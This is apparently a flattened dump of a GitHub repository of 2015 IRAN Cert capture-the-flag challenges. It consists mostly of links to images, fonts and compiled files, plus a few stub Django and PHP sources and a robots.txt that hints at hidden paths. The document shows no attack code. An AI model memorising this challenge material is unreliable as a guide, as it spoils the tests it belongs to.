/Challenges/IRAN Cert/2015/hijacked/images/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/6.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/images/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/7.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/images/8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/8.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/images/9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/9.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/sourcefiles/fonts/glyphicons-halflings-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/sourcefiles/fonts/glyphicons-halflings-regular.eot -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/sourcefiles/fonts/glyphicons-halflings-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/sourcefiles/fonts/glyphicons-halflings-regular.ttf -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/sourcefiles/fonts/glyphicons-halflings-regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/sourcefiles/fonts/glyphicons-halflings-regular.woff -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/sourcefiles/fonts/glyphicons-halflings-regular.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/sourcefiles/fonts/glyphicons-halflings-regular.woff2 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/sourcefiles/logout.php: -------------------------------------------------------------------------------- 1 | $value ) 7 | { 8 | setcookie( $key, $value, $past, '/' ); 9 | } 10 | header("Location: login.php");//use for the redirection to some page 11 | ?> -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/sourcefiles/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Allow: /login.php 3 | Allow: /register.php 4 | Allow: /css/ 5 | Allow: /js/ 6 | Allow: /fonts/ 7 | Disallow: /defcon/ 8 | Disallow: /private/create_session.php 9 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/sourcefiles/stuff/rand.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/sourcefiles/stuff/salt.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/manage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | import sys 4 | 5 | if __name__ == "__main__": 6 | os.environ.setdefault("DJANGO_SETTINGS_MODULE", "maze.settings") 7 | 8 | from django.core.management import execute_from_command_line 9 | 10 | execute_from_command_line(sys.argv) 11 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/maze/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/maze/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/maze/settings.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze/settings.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/maze/urls.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze/urls.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/maze/wsgi.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze/wsgi.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/admin.py: -------------------------------------------------------------------------------- 1 | from django.contrib import admin 2 | 3 | # Register your models here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/admin.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/admin.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/forms.py: -------------------------------------------------------------------------------- 1 | __author__ = 'Execut3' 2 | from django import forms 3 | 4 | class SessionForm(forms.Form): 5 | username = forms.CharField(widget=forms.TextInput(attrs={'size':'48', 'class':'form-control','placeholder':'username here'}),label='') 6 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/forms.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/forms.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/models.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/models.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/views.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/maze_app/views.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_dirs/fonts/glyphicons-halflings-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_dirs/fonts/glyphicons-halflings-regular.eot -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_dirs/fonts/glyphicons-halflings-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_dirs/fonts/glyphicons-halflings-regular.ttf -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_dirs/fonts/glyphicons-halflings-regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_dirs/fonts/glyphicons-halflings-regular.woff -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_dirs/fonts/glyphicons-halflings-regular.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_dirs/fonts/glyphicons-halflings-regular.woff2 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/changelist-bg.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/changelist-bg.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/changelist-bg_rtl.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/changelist-bg_rtl.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/default-bg-reverse.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/default-bg-reverse.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/default-bg.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/default-bg.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/deleted-overlay.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/deleted-overlay.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/gis/move_vertex_off.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/gis/move_vertex_off.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/gis/move_vertex_on.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/gis/move_vertex_on.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon-no.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon-no.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon-unknown.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon-unknown.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon-yes.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon-yes.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_addlink.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_addlink.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_alert.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_alert.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_calendar.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_calendar.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_changelink.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_changelink.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_clock.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_clock.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_deletelink.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_deletelink.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_error.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_error.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_searchbox.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_searchbox.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_success.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/icon_success.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-delete-8bit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-delete-8bit.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-delete.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-delete.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-restore-8bit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-restore-8bit.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-restore.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-restore.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-splitter-bg.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/inline-splitter-bg.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/nav-bg-grabber.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/nav-bg-grabber.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/nav-bg-reverse.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/nav-bg-reverse.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/nav-bg-selected.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/nav-bg-selected.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/nav-bg.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/nav-bg.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/selector-icons.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/selector-icons.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/selector-search.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/selector-search.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/sorting-icons.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/sorting-icons.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/tooltag-add.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/tooltag-add.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/tooltag-arrowright.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/admin/img/tooltag-arrowright.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/fonts/glyphicons-halflings-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/fonts/glyphicons-halflings-regular.eot -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/fonts/glyphicons-halflings-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/fonts/glyphicons-halflings-regular.ttf -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/fonts/glyphicons-halflings-regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/fonts/glyphicons-halflings-regular.woff -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/fonts/glyphicons-halflings-regular.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/maze/sourcefiles/static/static_root/fonts/glyphicons-halflings-regular.woff2 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/fonts/glyphicons-halflings-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/fonts/glyphicons-halflings-regular.eot -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/fonts/glyphicons-halflings-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/fonts/glyphicons-halflings-regular.ttf -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/fonts/glyphicons-halflings-regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/fonts/glyphicons-halflings-regular.woff -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/fonts/glyphicons-halflings-regular.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/fonts/glyphicons-halflings-regular.woff2 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/icon.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/icon.gif -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/logout.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide2.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide3.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide4.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide5.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide6.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide6.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide7.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide7.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | simple-php-captcha.sublime-project 3 | simple-php-captcha.sublime-workspace -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/45-degree-fabric.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/45-degree-fabric.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/cloth-alike.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/cloth-alike.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/grey-sandbag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/grey-sandbag.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/kinda-jean.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/kinda-jean.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/polyester-lite.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/polyester-lite.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/stitched-wool.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/stitched-wool.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/white-carbon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/white-carbon.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/white-wave.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/white-wave.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/fonts/times_new_yorker.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN 